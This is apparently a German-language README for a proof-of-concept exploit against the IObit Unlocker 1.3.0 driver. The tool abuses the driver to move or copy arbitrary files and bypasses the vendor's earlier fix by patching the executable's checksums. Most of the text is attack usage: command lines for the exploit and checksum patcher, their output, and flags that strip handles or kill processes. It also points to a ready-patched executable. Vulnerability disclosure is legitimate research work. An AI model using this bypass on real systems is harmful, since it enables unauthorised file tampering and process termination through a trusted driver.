
(0 Day) CVE-2026-37334 Verschiebt oder kopiert beliebige Dateien. Umgeht den vorherigen Patch mit einem Checksummen-Trick. IObit Unlocker v. 1.3.0
(0 Day) Verschiebt oder kopiert beliebige Dateien. Umgeht den vorherigen Patch mit einem Prüfsummen-Trick.
Writeup: https://nathan2.com/files/iobit.pdf Allgemeine Informationen: https://nathan2.com/posts/iobit/
Ich habe dies entdeckt, ohne zu wissen, dass es bereits einen früheren Exploit gab, der dies zuerst entdeckt hat. Dieser umgeht jedoch den Patch, den IObit erstellt hat. Funktioniert in Version 1.3.0
Verwendung:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- Sende Anfrage ---
Quelle: C:\copied.txt
Ziel: C:\t.txt
Subtyp: 4 | Flags: 1
IOCTL erfolgreich. Treiber gab 4 Bytes zurück.
Überprüfung: Zieldatei vorhanden/zugreifbar.
Weitere Flags:
Verwendung: UnlockerCLI.exe <Quellpfad> <Zielpfad> <Subtyp> <Flags>
Beispiel: UnlockerCLI.exe "C:\Pfad mit Leerzeichen\datei.txt" "C:\backup\datei.txt" 3 (Subtyp) 5 (Operations-Flag)
Subtypen: (zumindest die, die ich verwende) 3=verschieben, 4=kopieren
Operations-Flags: 0=Handle nicht entfernen, 1 = Handles entfernen, 2 = Prozesse mit Handles beenden, 4 = Prozesse beenden und Handles entfernen, 5??? experimentieren.
Die beigefügte ausführbare Datei sollte funktionsfähig und bereits gepatcht sein. Falls nicht, lies unten weiter.
Verwende den Prüfsummen-Patcher, um den PoC zu patchen. Wie folgt:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
Originaldateigröße: 235449 Bytes
Aktuelle alternierende Summe: 11044471
Aktuelle XOR-Summe: 43
Datei hat bereits die korrekten Prüfsummen. Keine Änderungen erforderlich.
Dies ermöglicht der ausführbaren Datei die Kommunikation mit dem IObitUnlocker-Treiber.